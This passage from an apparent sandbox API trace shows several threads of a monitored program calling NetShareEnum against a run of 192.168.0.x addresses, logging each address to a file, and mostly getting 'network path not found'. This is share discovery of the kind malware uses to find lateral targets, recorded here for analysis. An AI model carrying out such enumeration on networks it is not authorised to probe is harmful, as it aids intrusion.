lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0205.886] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.198", cchWideChar=15, lpMultiByteStr=0x1e82f0c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.198", lpUsedDefaultChar=0x0) returned 15 [0205.889] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x299ec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0205.889] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0205.889] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0205.889] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x299ec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0205.889] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0205.889] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0205.889] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x11, lpNumberOfBytesWritten=0x299fc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x299fc54*=0x11, lpOverlapped=0x0) returned 1 [0205.895] NetShareEnum (in: servername="\\\\192.168.0.198", level=0x1, bufptr=0x299fedc, prefmaxlen=0xffffffff, entriesread=0x299fed4, totalentries=0x299fed0, resume_handle=0x299fecc | out: bufptr=0x299fedc, entriesread=0x299fed4, totalentries=0x299fed0, resume_handle=0x299fecc) returned 0x35 [0257.982] SetEvent (hEvent=0x1dc) returned 1 [0257.982] RtlExitUserThread (Status=0x0) Thread: id = 27 os_tid = 0x8dc [0088.092] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.6", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0088.092] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.6", cchWideChar=13, lpMultiByteStr=0x1e82f0c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.6", lpUsedDefaultChar=0x0) returned 13 [0088.092] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x2adec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0088.092] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0088.093] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0088.093] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x2adec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0088.093] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0088.093] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0088.093] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0xf, lpNumberOfBytesWritten=0x2adfc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x2adfc54*=0xf, lpOverlapped=0x0) returned 1 [0088.093] NetShareEnum (in: servername="\\\\192.168.0.6", level=0x1, bufptr=0x2adfedc, prefmaxlen=0xffffffff, entriesread=0x2adfed4, totalentries=0x2adfed0, resume_handle=0x2adfecc | out: bufptr=0x2adfedc, entriesread=0x2adfed4, totalentries=0x2adfed0, resume_handle=0x2adfecc) returned 0x35 [0144.375] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.105", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0144.375] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.105", cchWideChar=15, lpMultiByteStr=0x1e82f0c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.105", lpUsedDefaultChar=0x0) returned 15 [0144.375] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x2adec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0144.375] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0144.375] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0144.375] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x2adec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0144.375] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0144.375] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0144.375] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x11, lpNumberOfBytesWritten=0x2adfc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x2adfc54*=0x11, lpOverlapped=0x0) returned 1 [0144.379] NetShareEnum (in: servername="\\\\192.168.0.105", level=0x1, bufptr=0x2adfedc, prefmaxlen=0xffffffff, entriesread=0x2adfed4, totalentries=0x2adfed0, resume_handle=0x2adfecc | out: bufptr=0x2adfedc, entriesread=0x2adfed4, totalentries=0x2adfed0, resume_handle=0x2adfecc) returned 0x35 [0178.349] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.171", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0178.349] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.171", cchWideChar=15, lpMultiByteStr=0x1e82f0c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.171", lpUsedDefaultChar=0x0) returned 15 [0178.349] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x2adec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0178.349] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0178.349] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0178.349] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x2adec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0178.349] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0178.349] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0178.349] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x11, lpNumberOfBytesWritten=0x2adfc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x2adfc54*=0x11, lpOverlapped=0x0) returned 1 [0178.353] NetShareEnum (in: servername="\\\\192.168.0.171", level=0x1, bufptr=0x2adfedc, prefmaxlen=0xffffffff, entriesread=0x2adfed4, totalentries=0x2adfed0, resume_handle=0x2adfecc | out: bufptr=0x2adfedc, entriesread=0x2adfed4, totalentries=0x2adfed0, resume_handle=0x2adfecc) returned 0x35 [0211.148] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.203", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0211.148] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.203", cchWideChar=15, lpMultiByteStr=0x1e82f0c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.203", lpUsedDefaultChar=0x0) returned 15 [0211.148] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x2adec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0211.148] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0211.148] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0211.148] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x2adec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0211.148] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0211.148] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0211.148] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x11, lpNumberOfBytesWritten=0x2adfc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x2adfc54*=0x11, lpOverlapped=0x0) returned 1 [0211.154] NetShareEnum (in: servername="\\\\192.168.0.203", level=0x1, bufptr=0x2adfedc, prefmaxlen=0xffffffff, entriesread=0x2adfed4, totalentries=0x2adfed0, resume_handle=0x2adfecc | out: bufptr=0x2adfedc, entriesread=0x2adfed4, totalentries=0x2adfed0, resume_handle=0x2adfecc) returned 0x35 [0257.932] SetEvent (hEvent=0x1dc) returned 1 [0257.932] RtlExitUserThread (Status=0x0) Thread: id = 28 os_tid = 0xa70 [0088.187] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.10", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0088.187] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.10", cchWideChar=14, lpMultiByteStr=0x1e82f0c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.10", lpUsedDefaultChar=0x0) returned 14 [0088.187] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x2c1ec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0088.187] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0088.187] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0088.187] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x2c1ec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0088.187] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0088.187] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0088.187] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2c1fc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x2c1fc54*=0x10, lpOverlapped=0x0) returned 1 [0088.249] NetShareEnum (in: servername="\\\\192.168.0.10", level=0x1, bufptr=0x2c1fedc, prefmaxlen=0xffffffff, entriesread=0x2c1fed4, totalentries=0x2c1fed0, resume_handle=0x2c1fecc | out: bufptr=0x2c1fedc, entriesread=0x2c1fed4, totalentries=0x2c1fed0, resume_handle=0x2c1fecc) returned 0x35 [0144.383] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.106", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0144.383] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.106", cchWideChar=15, lpMultiByteStr=0x1e82f0c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.106", lpUsedDefaultChar=0x0) returned 15 [0144.383] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x2c1ec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0144.383] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0144.383] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0144.383] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x2c1ec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0144.383] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0144.383] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0144.383] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x11, lpNumberOfBytesWritten=0x2c1fc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x2c1fc54*=0x11, lpOverlapped=0x0) returned 1 [0144.390] NetShareEnum (in: servername="\\\\192.168.0.106", level=0x1, bufptr=0x2c1fedc, prefmaxlen=0xffffffff, entriesread=0x2c1fed4, totalentries=0x2c1fed0, resume_handle=0x2c1fecc | out: bufptr=0x2c1fedc, entriesread=0x2c1fed4, totalentries=0x2c1fed0, resume_handle=0x2c1fecc) returned 0x35 [0178.355] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.172", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0178.355] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.172", cchWideChar=15, lpMultiByteStr=0x1e82f0c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.172", lpUsedDefaultChar=0x0) returned 15 [0178.355] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x2c1ec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0178.355] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0178.355] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0178.355] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x2c1ec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0178.355] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0178.355] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0178.355] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x11, lpNumberOfBytesWritten=0x2c1fc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x2c1fc54*=0x11, lpOverlapped=0x0) returned 1 [0178.361] NetShareEnum (in: servername="\\\\192.168.0.172", level=0x1, bufptr=0x2c1fedc, prefmaxlen=0xffffffff, entriesread=0x2c1fed4, totalentries=0x2c1fed0, resume_handle=0x2c1fecc | out: bufptr=0x2c1fedc, entriesread=0x2c1fed4, totalentries=0x2c1fed0, resume_handle=0x2c1fecc) returned 0x35 [0211.149] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.204", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0211.149] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.204", cchWideChar=15, lpMultiByteStr=0x1e82f0c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.204", lpUsedDefaultChar=0x0) returned 15 [0211.149] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x2c1ec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0211.149] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0211.149] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0211.149] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x2c1ec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0211.149] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0211.149] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0211.149] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x22, lpNumberOfBytesWritten=0x2c1fc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x2c1fc54*=0x22, lpOverlapped=0x0) returned 1 [0211.258] NetShareEnum (in: servername="\\\\192.168.0.204", level=0x1, bufptr=0x2c1fedc, prefmaxlen=0xffffffff, entriesread=0x2c1fed4, totalentries=0x2c1fed0, resume_handle=0x2c1fecc | out: bufptr=0x2c1fedc, entriesread=0x2c1fed4, totalentries=0x2c1fed0, resume_handle=0x2c1fecc) returned 0x35 [0258.059] SetEvent (hEvent=0x1dc) returned 1 [0258.059] RtlExitUserThread (Status=0x0) Thread: id = 29 os_tid = 0x1a0 [0088.177] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.8", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0088.177] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.8", cchWideChar=13, lpMultiByteStr=0x1e82f0c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.8", lpUsedDefaultChar=0x0) returned 13 [0088.177] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x2d5ec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0088.177] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0088.177] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0088.177] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x2d5ec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0088.177] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0088.177] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0088.177] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0xf, lpNumberOfBytesWritten=0x2d5fc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x2d5fc54*=0xf, lpOverlapped=0x0) returned 1 [0088.178] NetShareEnum (in: servername="\\\\192.168.0.8", level=0x1, bufptr=0x2d5fedc, prefmaxlen=0xffffffff, 